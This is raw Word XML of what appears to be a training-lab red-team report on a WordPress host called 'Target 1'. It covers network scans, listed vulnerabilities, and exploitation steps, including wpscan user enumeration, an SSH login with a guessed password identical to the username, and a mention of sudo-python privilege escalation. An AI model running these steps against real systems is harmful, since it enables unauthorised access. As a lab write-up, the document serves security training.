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09922369" wp14:textId="04F903D0">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Red Team: Summary of Operations</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="7944C890" wp14:textId="465C0A63">
      <w:pPr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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F9FB03A" wp14:textId="664E9038">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>## Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6683F587" wp14:textId="7CECA03D">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7BD14B5D" wp14:textId="1F17C5E5">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Critical Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="27673C70" wp14:textId="197C3D18">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="22320FE7" wp14:textId="23337E4E">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867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</w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54D49C46" wp14:textId="4AB94F88">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>### Exposed Services</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="6D1A0DD3" wp14:textId="6AA07E7B">
      <w:pPr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  <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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4FF3FED" w:rsidR="54FF3FED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n-US"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="4B3E2A0E" w14:textId="3D37B074">
      <w:pPr>
        <w:pStyle w:val="Normal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$ Netdiscover results identify the IP addresses of Targets on the network:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3AFC61DD" w14:textId="1485AD67">
      <w:pPr>
        <w:pStyle w:val="Normal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$ Netdiscover –r 192.168.1.255/16</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="3EB2A215" wp14:anchorId="5A2B5DDE">
            <wp:extent cx="4572000" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1966100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97e08849d342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8DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="73DD759C" w14:textId="69649C25">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="59E55F26" w14:textId="228E3FFD"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Nmap scan results for each machine reveal the below services and OS details:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="261D0644" w14:textId="17B86FB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Name of VM: </w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="0E11BE12" w14:textId="0B63F05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OS: Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="02BA4C7A" w14:textId="5E5D50A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Purpose: Defensive Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="44C15FFF" w14:textId="7608B5F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IP Address: 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="76770AE4" w14:textId="0F106D9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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7DCD1EA2" wp14:textId="70E174D5"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$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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192.168.110</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="61CD880C" wp14:textId="10CDC615">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="34A7CF39" wp14:anchorId="31BD952F">
            <wp:extent cx="4572000" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="876746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33d2895cf245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4644A94A" wp14:textId="49998EFD">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21ED7094" wp14:textId="3A8ACA84">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867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</w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7D4FED2C" wp14:textId="60282150">
      <w:r w:rsidRPr="2423A867" w:rsidR="2423A867">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This scan identifies the services below as potential points of entry:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="51DFC2AE" wp14:textId="1355FD34"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- </w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="7DE3C1B0" wp14:textId="735738A5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Port 22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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open </w:t>
      </w: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ssh</w:t>
      </w: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</w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="54B11370" wp14:textId="3C08B4F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr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Port 80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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open http </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="6D66929E" wp14:textId="124AE5FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr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Port 111/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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open rpcbind </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="6E28B93C" w14:paraId="3E836DEA" wp14:textId="4DEF1FA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr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Port 139/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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open netbios-ssn </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="3EE83C08" wp14:textId="6022666A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr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Port 445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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open netbios-ssn </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="11513664" w14:textId="5807807B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498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="4073942A" w14:textId="62486557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### Critical Vulnerabilities</w:t>
      </w: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</w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="526FD46B" w14:textId="1B68F51D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The following vulnerabilities were </w:t>
      </w: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identified</w:t>
      </w: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on each target: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="54D58CAF" w14:textId="6CC549A2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- </w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="54FF3FED" w:rsidRDefault="498DE0C0" w14:paraId="4005FC3B" w14:textId="0574D718">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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user enumeration (WordPress site)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="52CF7204" w14:textId="4A5BBE10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/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find</w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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498DE0C0" w:rsidR="498DE0C0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valid</w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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usernames for the target system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="1CF266E2" w14:textId="09EFE90E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr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Open Port SSH and weak user password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="4760D7EF" w14:textId="10EA9CDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/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Users can </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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into machine with a password, not requiring an SSH key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="1DEACA53" w14:textId="66363A83">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1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Was able to manually brute force user Michael password (same as his username).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="39B1BB55" w14:textId="54627AC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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MySQL Database Access and Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="1BE360E5" w14:textId="3FDA9B71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/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Username and password to access the MySQL database were in plaintext in the wp-</w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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config.php</w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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file and not hashed as is best practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="2293D94A" w14:textId="33D88C42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/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Able to gain access to the MySQL database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3DA0A46A" w14:textId="01D5828D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/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Attack was able to exfiltrate the password hashes and crack with John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="3A058178" w14:textId="584041DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1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Privilege Escalation/Misconfiguration of User Privileges (Python can run with </w:t>
      </w:r>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="54FF3FED" w14:paraId="1C3AE5BE" wp14:textId="455181C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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Allows user to use python as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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to execute a shell program, granting access to the root account</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="54FF3FED" w14:paraId="253AEC8B" wp14:textId="3140F535">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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hyperlink r:id="Reabeb119a2754bd8">
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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CVE-2017-15710 Apache httpd 2.4.10</w:t>
        </w:r>
      </w:hyperlink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- could be used as a </w:t>
      </w:r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>DDos</w:t>
      </w:r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attack</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="54FF3FED" w14:paraId="6DD204F3" wp14:textId="2D9C6350">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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hyperlink r:id="R839d61d82d8244c5">
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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CVE-2017-8779 Exploit on open rpcbind</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - allows remote attackers to cause a DOS via rpcbomb (crafted UDP packet to port 111)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="54FF3FED" w14:paraId="474721C4" wp14:textId="3847C190">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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hyperlink r:id="R1cfc21e9bc4b483a">
        <w:r w:rsidRPr="54FF3FED" w:rsidR="54FF3FED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CVE-2020-10745 Samba NetBIOS</w:t>
        </w:r>
      </w:hyperlink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– vulnerable to remote code execution vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="54FF3FED" w14:paraId="31BEA86F" wp14:textId="536F0E61">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720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</w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="69480871" wp14:textId="019F3DC5"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### Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="485BEA88" w14:textId="0F6DA4D3"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The Red Team was able to penetrate `Target 1` and retrieve the following confidential data:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="671FDC1E" wp14:textId="1D790E38"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- </w:t>
      </w:r>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C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Target 1</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="74325863" wp14:textId="6234FA28"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- `flag1.txt`: b9bbb33e11b80be759c4e844862482d</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7862481C" wp14:textId="65178906"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- **Exploit Used**</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="0402955C" wp14:textId="522348EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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2"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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user enumeration (WordPress site)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="6AF2652C" wp14:textId="734480A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/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Enumerate WordPress site Users with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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to obtain username </w:t>
      </w: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michael</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="08A836EF" wp14:textId="4DCFC2A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/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Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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hyperlink r:id="Rfee361889e34457d">
        <w:r w:rsidRPr="498DE0C0" w:rsidR="498DE0C0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http://192.168.1.110/wordpress</w:t>
        </w:r>
      </w:hyperlink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--</w:t>
      </w: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enumerate</w:t>
      </w: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u </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="433F1331" wp14:textId="2499F2A7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="315783C2" wp14:anchorId="34594144">
            <wp:extent cx="4572000" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="699508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79a10575be4a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05EBD20D" wp14:anchorId="5E3C819C">
            <wp:extent cx="4572000" cy="2066925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2082128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13069a750843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7BA96CE9" wp14:anchorId="2E78758C">
            <wp:extent cx="4572000" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1976294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98c4fb12574b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8DE0C0" w14:paraId="1A4DC529" wp14:textId="5293AB60">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="6E28B93C">
        <w:rPr/>
        <w:t xml:space="preserve">Visited the IP address of </w:t>
      </w:r>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
      <w:r w:rsidR="6E28B93C">
        <w:rPr/>
        <w:t xml:space="preserve"> 192.168.1.110 over HTTP port 80 shows Raven Security – The Professionals.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="498DE0C0" w14:paraId="47FBC75E" wp14:textId="63A28B35">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="403B6684" wp14:anchorId="6EB7B96A">
            <wp:extent cx="4572000" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1164010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bafca1868243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8DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="57F696E1" w14:textId="4B2750C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Open Port SSH and weak user password (targeting user Michael)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="5B6150CB" w14:textId="29ACE7FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr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Used SSH to get user shell for user Michael</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="5F048807" w14:textId="61B9C446">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr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Simply used manual Brute Force attack, the password was weak and obvious</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="77676BC9" w14:textId="4DCBB587">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr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Comand</w:t>
      </w:r>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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: </w:t>
      </w:r>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C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hyperlink r:id="Re9b578ccbc5f41c6">
        <w:r w:rsidRPr="6E28B93C" w:rsidR="6E28B93C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>michael@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="6E28B93C" w:rsidRDefault="498DE0C0" w14:paraId="7BC65E78" w14:textId="7914E944">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr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pw: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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michael</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="498DE0C0" w:rsidP="498DE0C0" w:rsidRDefault="498DE0C0" w14:paraId="2A1514A8" w14:textId="719AA9DF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="16F99106" wp14:anchorId="2EC75DC3">
            <wp:extent cx="4572000" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
